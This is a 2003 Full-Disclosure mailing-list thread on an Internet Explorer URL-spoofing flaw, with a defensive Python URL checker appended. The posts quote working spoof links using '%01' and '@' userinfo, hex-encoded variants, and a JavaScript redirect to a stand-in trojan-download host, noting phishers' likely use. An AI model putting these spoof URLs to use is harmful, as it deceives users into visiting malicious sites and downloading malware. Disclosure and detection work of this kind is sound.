
Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability



Umm, tested this; you don't need %01 either, btw.

www.microsoft.com@www.linux.org

Was messing around with some hex style as well. Is there a way to call a file:// 
inside a http://? Because the issue with doing the @ trick is that it appends 
http:// automatically. Mind you, you could just make it exec some VB code or 
something on a site; just a random idea anyway.

And it also doesn't seem to work if you use hex for the full domain as well, i.e.

www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67

nor www.microsoft.com%40www.linux.org

whereas www.microsoft.com@%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67 works.






----- Original Message ----- 
  From: Julian HO Thean Swee 
  To: 'full-disclosure@lists.netsys.com' 
  Sent: Wednesday, December 10, 2003 4:22 PM
  Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing 
vulnerability


  Hmm, it doesn't seem to work on my browser :) 
  I don't even get transported to any page when I click the button. 
  But then again, I have everything turned off in the internet zone by 
default... 
  (but my submit non-encrypted form data is on) 

  Does it really work then?  It looks like it's using javascript...? 
(location.href) 
  Merry Christmas everyone :) 

    --__--__-- 

    Message: 1 
    Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST) 
    From: S G Masood <sgmasood@yahoo.com> 
    To: full-disclosure@lists.netsys.com 
    Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing 
vulnerability 



    LOL. This is so simple and dangerous, it almost made 
    me laugh and cry at the same time. Most of you will 
    realise why...;D 
    The Paypal, AOL, Visa, Mastercard, et al email 
    scammers will have a harvest of gold this month with 
    lots of zombies falling for this simple technique. 

    ># POC ########## 
    >http://www.zapthedingbat.com/security/ex01/vun1.htm 

    Don't be surprised if your latest download from 
    http://www.microsoft.com turns out to be a trojan! 

    location.href=unescape('http://windowsupdate.microsoft.com%01@comedownloadaneviltrojanfromme.com');



    -- 
    S.G.Masood 

    Hyderabad, 
    India 

    PS: One more thing - no scripting required to exploit this. 




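
A defender-side check for the link forms discussed in this thread, as an added example that is not part of the original posts: it splits the authority at the last "@", reports the host the request would actually go to, and flags userinfo that looks like a hostname or hides control characters such as %01. The function name `analyze_url` and the finding labels are assumptions made for this illustration.

```python
from urllib.parse import urlsplit, unquote

def analyze_url(url):
    """Return (effective_host, findings) for a link taken from mail or a web page."""
    if "://" not in url:
        url = "http://" + url            # the thread's examples omit the scheme
    parts = urlsplit(url)
    # Everything before the last "@" in the authority is userinfo, not the host.
    userinfo, at, hostport = parts.netloc.rpartition("@")
    host = unquote(parts.hostname or "").lower()
    findings = []
    if at:
        findings.append("userinfo-present")
        decoded_user = unquote(userinfo)
        # %01 and similar bytes can truncate what the address bar displays.
        if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded_user):
            findings.append("control-char-in-userinfo")
        # A dotted "username" is there to be read as a site name.
        if "." in decoded_user.split(":")[0]:
            findings.append("userinfo-looks-like-hostname")
    if "%" in hostport:
        findings.append("percent-encoded-host")
    if "@" in host:
        findings.append("encoded-at-in-host")
    return host, findings

# Constructed sample list: the link forms quoted in the thread plus one benign URL.
SAMPLES = [
    "http://windowsupdate.microsoft.com%01@comedownloadaneviltrojanfromme.com",
    "www.microsoft.com@www.linux.org",
    "www.microsoft.com@%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67",
    "www.microsoft.com%40www.linux.org",
    "http://www.microsoft.com/downloads",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        host, findings = analyze_url(sample)
        print(f"{sample}\n  effective host: {host}\n  findings: {findings or 'none'}")
```

A mail gateway or proxy can apply the same test to links in message bodies and quarantine or rewrite any URL that returns a non-empty findings list.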